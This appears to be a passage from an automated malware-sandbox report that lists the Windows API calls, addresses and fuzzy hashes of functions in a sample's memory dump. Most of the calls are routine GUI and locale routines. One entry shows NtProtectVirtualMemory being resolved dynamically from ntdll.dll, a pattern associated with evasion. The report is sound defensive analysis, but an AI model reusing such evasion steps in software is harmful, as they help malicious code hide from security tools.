                                                                                                                                  • Instruction Fuzzy Hash: 3601B5BDE4075CBAEB11DB96DD81BB973ECDB08B00F600061BA10D7580E7797910DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0422BC0B
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BC9A
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BCC9
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BCF8
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BD1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 582dc3a756e4d28b46792dd7a9df800bdb8731dc5a6e5da42fed939f0984377d
                                                                                                                                  • Instruction ID: 7fc1429c4247c10c85620f22bc40999b2adfdb839ec1ef24aae744fc8e239d41
                                                                                                                                  • Opcode Fuzzy Hash: 582dc3a756e4d28b46792dd7a9df800bdb8731dc5a6e5da42fed939f0984377d
                                                                                                                                  • Instruction Fuzzy Hash: 02819234B10258EFDB44DF99C688EA9B7F9AF49304F6541E5A808DB362CB74BE40DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(00000000), ref: 0422D800
                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0422D81D
                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0422D852
                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0422D86E
                                                                                                                                    • Part of subcall function 041E669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041E66CE
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0422D8B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$LoadStringWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1738039741-0
                                                                                                                                  • Opcode ID: 5e983e14e4acc96ceac0bc55c6530ea54fbf05403a2a3f00c40f97db5a83c2ca
                                                                                                                                  • Instruction ID: 552832b16095e4f598e43a47cb61d78385e51914c2ab66812bc997bb4b58c20e
                                                                                                                                  • Opcode Fuzzy Hash: 5e983e14e4acc96ceac0bc55c6530ea54fbf05403a2a3f00c40f97db5a83c2ca
                                                                                                                                  • Instruction Fuzzy Hash: 7251B074B343626BFB21AF38CA847AA37A5AF00308F0444F5AC549B296DB78F8468751
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0420FFFF
                                                                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 04210050
                                                                                                                                  • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04210089
                                                                                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 04210096
                                                                                                                                  • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04210101
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Draw$OffsetRectText$Edge
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3610532707-0
                                                                                                                                  • Opcode ID: 546333b2e34dc501350058ba9b0a0c86c25dae9b29036c59aa91a707b580532e
                                                                                                                                  • Instruction ID: 599309b2272b62514e5ef3515a3ef925740e0801403e18ee6d69deabee522fcd
                                                                                                                                  • Opcode Fuzzy Hash: 546333b2e34dc501350058ba9b0a0c86c25dae9b29036c59aa91a707b580532e
                                                                                                                                  • Instruction Fuzzy Hash: 1F519074B20605AFEB21EFA8C984BAEB7F5AF09328F558191F814A7791C7B4FD408750
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 04217F88: WindowFromPoint.USER32(-000000F7,?,00000000,04217B5A,?,-00000010,?), ref: 04217F8E
                                                                                                                                    • Part of subcall function 04217F88: GetParent.USER32(00000000), ref: 04217FA5
                                                                                                                                  • GetWindow.USER32(00000000,00000004), ref: 04217B62
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04217C36
                                                                                                                                  • EnumThreadWindows.USER32(00000000,04217AD4,?), ref: 04217C3C
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 04217C53
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 04217CC1
                                                                                                                                    • Part of subcall function 04216FC8: GetWindowThreadProcessId.USER32(?), ref: 04216FD5
                                                                                                                                    • Part of subcall function 04216FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,04213C39,?,04212CF5), ref: 04216FDE
                                                                                                                                    • Part of subcall function 04216FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 04216FF3
                                                                                                                                    • Part of subcall function 04216FC8: GetPropA.USER32(?,00000000), ref: 0421700A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2202917067-0
                                                                                                                                  • Opcode ID: 3898fe5c8db6fca47a7a61db4f21cb313fb4837578162fbf3164a011d664c21d
                                                                                                                                  • Instruction ID: 08c1dc562a29f78da139e1e554f114b572d1db0ea16a8eb9c38bd629c23d4a0a
                                                                                                                                  • Opcode Fuzzy Hash: 3898fe5c8db6fca47a7a61db4f21cb313fb4837578162fbf3164a011d664c21d
                                                                                                                                  • Instruction Fuzzy Hash: 18515835B1020AAFDB10DF69D484AAEB7E4BF98354F1485A1E814EB360D734FE41CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 0421F91F
                                                                                                                                  • SaveDC.GDI32(00000000), ref: 0421F958
                                                                                                                                  • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,0421FA16,?,00000000), ref: 0421F9DA
                                                                                                                                  • RestoreDC.GDI32(00000000,?), ref: 0421FA10
                                                                                                                                  • EndPaint.USER32(00000000,?,0421FA5A), ref: 0421FA4D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808407030-0
                                                                                                                                  • Opcode ID: 9555007ff20966f7d48513bd51fbe9694658053c84df14950c9d332a9240a2e1
                                                                                                                                  • Instruction ID: 87f327806066015e19fbde12c746b16a849c64115c73a63154beaa12d20ea98b
                                                                                                                                  • Opcode Fuzzy Hash: 9555007ff20966f7d48513bd51fbe9694658053c84df14950c9d332a9240a2e1
                                                                                                                                  • Instruction Fuzzy Hash: B0417C70A14609AFDB14DFA8CA95FAEBBF4BB58308F1640A9E914972B1D774AD00CB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 80c24863d68ae057a23aac3ce093ac26db4a2c35a001c73f99482f8711476b24
                                                                                                                                  • Instruction ID: f5f2b94d83863267a093575be851103b77dc9175e9d53e2b88c66e431a3c73cb
                                                                                                                                  • Opcode Fuzzy Hash: 80c24863d68ae057a23aac3ce093ac26db4a2c35a001c73f99482f8711476b24
                                                                                                                                  • Instruction Fuzzy Hash: 4F11B7317A170A9AFB70BE7A9A4876B37C95F41648F469065BD00D72C3DBE4F806C254
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 042061A2
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
                                                                                                                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 042061F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404249990-0
                                                                                                                                  • Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                  • Instruction ID: c5b8fbb284463876d5c5002b843e1e520425e34c1c1d1c3d6c75162c823397e2
                                                                                                                                  • Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                  • Instruction Fuzzy Hash: 441193317156AA6EEB20EF2588807EE7BD1AF01355F448121FC009B6C3D7B4E8A5C3A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 04230E6C
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04230E9E
                                                                                                                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0422E59C), ref: 04230ED7
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04230EF0
                                                                                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0422E59C), ref: 04230F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$AttributesLayeredRedraw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1758778077-0
                                                                                                                                  • Opcode ID: 3fc7dc7823026d9fb57804b38752851ea7b365658a40cd998610c6a2d4ecedd7
                                                                                                                                  • Instruction ID: 4c5ae9d65ed7a45eb690c0a6cf48cbb3417b9c8e6d1288d8cdb4b6cb4850f721
                                                                                                                                  • Opcode Fuzzy Hash: 3fc7dc7823026d9fb57804b38752851ea7b365658a40cd998610c6a2d4ecedd7
                                                                                                                                  • Instruction Fuzzy Hash: C211CAA0B1476126EB116B7D5C88FA53A9C6B0531DF0845B0BD65EA1C6CBA8E944CB70
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 04203B78
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 04203B94
                                                                                                                                  • GetPaletteEntries.GDI32(0E080DB6,00000000,00000008,?), ref: 04203BAC
                                                                                                                                  • GetPaletteEntries.GDI32(0E080DB6,00000008,00000008,?), ref: 04203BC4
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 04203BE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EntriesPalette$CapsDeviceRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3128150645-0
                                                                                                                                  • Opcode ID: 708af90a0e63f69e1af6ba946a1df223c1b85c3363410d07d681dc9ce003dc9a
                                                                                                                                  • Instruction ID: cf60363827cf095e956c28f0fe41cd4d106044aaa0cec27d7d0e5e26d376bf51
                                                                                                                                  • Opcode Fuzzy Hash: 708af90a0e63f69e1af6ba946a1df223c1b85c3363410d07d681dc9ce003dc9a
                                                                                                                                  • Instruction Fuzzy Hash: 4A11E135648204AFFB00CAA99C85F6DB7E8E704718F808095F5589A1C1DA76A404CB20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,041EBBE7,?,?,00000000), ref: 041EBB68
                                                                                                                                    • Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,041EBBE7,?,?,00000000), ref: 041EBB98
                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 041EBBA3
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,041EBBE7,?,?,00000000), ref: 041EBBC1
                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 041EBBCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                  • Opcode ID: 1028215d0c77197d1555670a3b46425e8b5c29822dcde8f0c8bdd3f121a78852
                                                                                                                                  • Instruction ID: ef2e4251b8051d81a8c727b13c786275d917f915924cd867e1caf08298dad83a
                                                                                                                                  • Opcode Fuzzy Hash: 1028215d0c77197d1555670a3b46425e8b5c29822dcde8f0c8bdd3f121a78852
                                                                                                                                  • Instruction Fuzzy Hash: 7E01DF7CB08E046BFA11FA668C92F7E7258DB86718F910560F404E66D4D734BE009668
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • UnhookWindowsHookEx.USER32(00000000), ref: 0423257F
                                                                                                                                  • SetEvent.KERNEL32(00000000,04234D8A), ref: 0423259A
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0423259F
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,04234D8A), ref: 042325B4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,04234D8A), ref: 042325BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2429646606-0
                                                                                                                                  • Opcode ID: 7766d956b5b35b650e101398647a32c14c0dc9846661ce45cbbfe1e092a7c5d3
                                                                                                                                  • Instruction ID: 5e449f30817562f73fd750b696ead4513241930c722706cd94808736946cc7ad
                                                                                                                                  • Opcode Fuzzy Hash: 7766d956b5b35b650e101398647a32c14c0dc9846661ce45cbbfe1e092a7c5d3
                                                                                                                                  • Instruction Fuzzy Hash: 8CF0A5B5B106119FD768EBBEF88CA2D33F4E704226B444998A118C3180E73CB841CB21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,041EBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 041EBC2F
                                                                                                                                    • Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                  • Opcode ID: 95c7266ceb16ae7ea2598f07261efc5327b7ad05f86d9971ff9a67144b1aa02d
                                                                                                                                  • Instruction ID: cd204d79bac2f5857762fc0306f83ae2196ef9abe0713222c834a81e570c8613
                                                                                                                                  • Opcode Fuzzy Hash: 95c7266ceb16ae7ea2598f07261efc5327b7ad05f86d9971ff9a67144b1aa02d
                                                                                                                                  • Instruction Fuzzy Hash: C541242C70CD054BF701EA7B89C02BEB2EAEB8520CB144565E462E7344EB38FD069765
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 042134E6
                                                                                                                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 04213538
                                                                                                                                  • DrawMenuBar.USER32(00000000), ref: 04213545
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                  • String ID: P
                                                                                                                                  • API String ID: 3227129158-3110715001
                                                                                                                                  • Opcode ID: b8d70658382c2658ab376a75750859cd73cdde9259c1aabd3cd63fcfb289b114
                                                                                                                                  • Instruction ID: b78ae9e61310daecfc7867929eb32cf319447573ddaecf00d97c609231523a6c
                                                                                                                                  • Opcode Fuzzy Hash: b8d70658382c2658ab376a75750859cd73cdde9259c1aabd3cd63fcfb289b114
                                                                                                                                  • Instruction Fuzzy Hash: BA1101702152016FF350DB28CC80B5A7BDAAF88764F148628F494DB2E4D739E844C786
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 041FFC21
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFC27
                                                                                                                                  Strings
                                                                                                                                  • NtProtectVirtualMemory, xrefs: 041FFC17
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 041FFC1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                  • API String ID: 1646373207-1386159242
                                                                                                                                  • Opcode ID: e4dc4ddbc0df274581b4046873a796b66ae1cf8da8ddcfb2bf5ce649740bd6f3
                                                                                                                                  • Instruction ID: 35a82db8a57706308d5e551833402d2213209e1fe6e3394b5eb6c0c4f4c7ec9e
                                                                                                                                  • Opcode Fuzzy Hash: e4dc4ddbc0df274581b4046873a796b66ae1cf8da8ddcfb2bf5ce649740bd6f3
                                                                                                                                  • Instruction Fuzzy Hash: 47E0B6B6600248AF8B40EF9DECC9D9B77ECAB1C7217804001BA18C7200D775F8528B74
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0424910B,00000000,0424911E), ref: 041ED6A6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 041ED6B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                  • Opcode ID: 1fd6cfcba0693d595f204bdb77316e77b6ac4316dd411eca5a1d82e5f61a5e5b
                                                                                                                                  • Instruction ID: f2f799dafd3c2da5abb1a371471bb0320dbf0dee50e9c4c2a701d37945472739
                                                                                                                                  • Opcode Fuzzy Hash: 1fd6cfcba0693d595f204bdb77316e77b6ac4316dd411eca5a1d82e5f61a5e5b
                                                                                                                                  • Instruction Fuzzy Hash: 1FD0C7AC791F46DFFB00BFAB74C863522E4E798315B80056568086E144D7F9BC45CB14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0421D6AB
